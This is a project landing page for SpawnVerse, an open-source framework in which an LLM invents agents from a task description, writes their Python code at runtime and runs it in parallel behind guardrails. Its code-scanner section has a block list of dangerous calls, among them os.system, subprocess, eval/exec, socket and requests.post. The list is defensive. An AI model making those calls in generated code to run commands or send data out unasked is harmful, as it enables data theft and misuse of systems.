Open Source · MIT · Groq / LLaMA · By sajosam

SpawnVerse

The universe where agents are born from tasks.
Zero pre-built agents. Give it one sentence — it invents the team.

↗ View on GitHub How it works
spawnverse — python run.py
$ python examples/01_general/run.py

══════════════════════════════════════════════
SPAWNVERSE — Self-Spawning Cognitive Agent System
run_id = 20250322_142031
Research top 5 EVs in India under 25 lakhs...
══════════════════════════════════════════════

PHASE 1 — DECOMPOSE TASK
[1] ev_specs_researcher deps=[] | Gathers EV specifications...
[2] pricing_analyst deps=[] | Researches pricing and subsidies...
[3] charging_infra_agent deps=[] | Maps charging infrastructure...
[4] ownership_cost_synthesizer deps=[1,2,3] | Calculates 5yr TCO...
[5] final_report_agent deps=[1,2,3,4] | Generates final ranking...

PHASE 2 — WAVE 1 Gathering (parallel)
[████████░░] 80% ev_specs_researcher: main work done
[████████░░] 80% pricing_analyst: main work done
[██████░░░░] 60% charging_infra_agent: work done
─────────────────────────────────────────────
ev_specs_researcher DONE 8.2s quality=0.87 drift=0.91
pricing_analyst DONE 7.6s quality=0.82 drift=0.88
charging_infra_agent DONE 6.9s quality=0.79 drift=0.85

PHASE 3 — WAVE 2 Synthesis
final_report_agent DONE 12.1s quality=0.91 drift=0.93

Agents: 5 (5 ok, 0 failed) · Fossils: 5 · Tokens: 14,821
0Pre-built agents
4Guardrail layers
Fossil memory
1pip install

The problem

Every framework makes you
define agents first.

LangChain, CrewAI, AutoGen, LangGraph — all require you to write the roles and prompts before the task arrives. SpawnVerse inverts this.

TRADITIONAL DEVELOPER defines agents manually FIXED AGENTS AgentA · AgentB · AgentC TASK ARRIVES forced into predefined team OUTPUT agents forget on exit vs SPAWNVERSE TASK ARRIVES plain English description ORCHESTRATOR LLM invents the team SPAWNED AGENTS code written at runtime · parallel FOSSIL MEMORY every death leaves a record
Traditional Framework
Developer defines agents
Fixed team structure
Same agents every run
You write the code
Agents forget everything
No memory isolation
SpawnVerse
Task defines agents
Team emerges from task
New agents every run
LLM writes the code
Agents leave fossil memory
Namespace-locked writes

How it works

One task in.
A workforce out.

SpawnVerse decomposes your task, writes agent code at runtime, runs agents safely in parallel, and collects structured output.

01
You describe the task
Plain English. Numbers, locations, budgets. As specific as you want. No config. No YAML.
natural language
02
LLM designs the agent team
Orchestrator asks the LLM what agents this task needs — roles, tasks, dependencies. Returns a JSON plan.
decomposition
03
Code written and scanned
LLM writes a full Python main() for each agent. Guardrail scans for dangerous patterns. Subprocess runs with OS resource limits.
code generation + security
04
Agents run in parallel waves
Wave 1 gathers information simultaneously. Wave 2 reads those outputs and synthesizes. Agent-to-agent messages via typed bus.
parallel execution
05
Every death leaves a fossil
Constitution, quality score, intent drift — all saved. Future runs search past fossils. The system accumulates intelligence.
fossil record

Features

Everything built in.

One design principle: agents should emerge from the task, not be defined before it.

Zero Pre-Built Agents
Every agent invented at runtime. No YAML. No decorators. No class definitions before the task.
🧠
Distributed Memory
Any agent reads any namespace. Writes locked to own namespace. Enforced at code-gen and DB layer. SQLite WAL.
🔀
Parallel Waves
ThreadPoolExecutor for Wave 1. All gathering agents start simultaneously. Configurable concurrency limit.
🌱
Recursive Spawning
Agents can request sub-agents. Quality scoring before any spawn is fulfilled. Depth limited by config.
🦴
Fossil Record
Every agent death deposits constitution + scores. Auto-indexed into ChromaDB. Future agents search them semantically.
📊
Intent Drift Scoring
Measures alignment between root task and each agent's output. The first framework to surface this metric.
🛡️
4-Layer Guardrails
Code scan → Budget → Output validator → Semantic judge. Every output independently verified before memory write.
🔍
Vector DB / RAG
Connect ChromaDB with your documents. Agents get rag_context() and rag_search(). Internal data stays internal.
📦
One Dependency
pip install groq — that's it. No Docker to start. Chromadb optional. Runs anywhere Python 3.10+ runs.

Memory model

Read everything.
Write only your own.

The distributed memory contract prevents agents from overwriting each other while giving every agent full visibility.

DISTRIBUTED MEMORY SQLite WAL · namespace partitioned flight_agent writes: result, log hotel_agent writes: result, log budget_agent reads: all · writes: own report_agent reads: all · writes: own WRITE own READ all
system
projectplantask_desc← orchestrator writes
flight_agent
resultlogcontext← only flight_agent writes
hotel_agent
resultlog← only hotel_agent writes
budget_agent
resultlog← reads flight + hotel, writes own only
Green = owner writes here
Grey = read-only for others
Blue = system namespace, orchestrator only

Guardrails

4 layers before anything
reaches shared memory.

Every agent passes 4 independent safety checks. A blocked output never corrupts other agents.

01 Code Scan before subprocess 02 Budget per-agent token limit 03 Output Valid size · structure check 04 Semantic Judge LLM-as-judge SHARED MEMORY safe to write
01
Code Scanner
Scans generated Python for dangerous patterns before the subprocess ever starts. File never runs if violations found.
os.systemsubprocesseval / exec __import__socketrequests.post
02
Budget Enforcer
Per-agent token limit baked into stdlib. When exhausted, think() returns empty. One runaway agent can't consume the whole run.
per_agent_tokens: 8000total token_budget: 80000rate limit backoff
03
Output Validator
Before the result enters shared memory: not None, not empty, not oversized, not an empty dict. Structural checks only.
min 10 charsmax 50 KBnon-empty dict
04
Semantic Judge
LLM-as-judge independently reviews every output for harmful content, PII, misinformation, and prompt injection attempts.
personal dataprompt injection misinformationharmful instructions

Usage

Three lines to start.

Pass a task. Get structured output. Everything else is automatic.

python
# pip install groq
from spawnverse import Orchestrator

Orchestrator().run({
    "description": "Research top 5 EVs in India under 25 lakhs",
    "context": {"buyer_type": "first-time EV buyer"}
})

# ── With config ─────────────────────────────────
from spawnverse import Orchestrator, DEFAULT_CONFIG

Orchestrator({**DEFAULT_CONFIG, "max_depth":3, "wave1_agents":5}).run({
    "description": "Your task here", "context": {}
})

# ── With your documents (RAG) ────────────────────
config = {**DEFAULT_CONFIG, "vector_db_enabled": True}

Orchestrator(config).run(
    {"description": "Analyse our Q3 vs market"},
    knowledge_base=["Your internal document text here"]
)

Get started

One command.

Groq API key is free at console.groq.com. No Docker. No other accounts.

Basic install
LLM reasoning only. Zero extra deps.
pip install groq
With vector DB
For RAG over your own documents.
pip install groq chromadb
bash
# Get a free key at console.groq.com
export GROQ_API_KEY=your_key_here

git clone https://github.com/sajosam/spawnverse
cd spawnverse

# Run example 1 — general reasoning
python spawnverse/examples/01_general/run.py

# Pass your own task inline
python spawnverse/examples/01_general/run.py "Research EVs in India under 25L"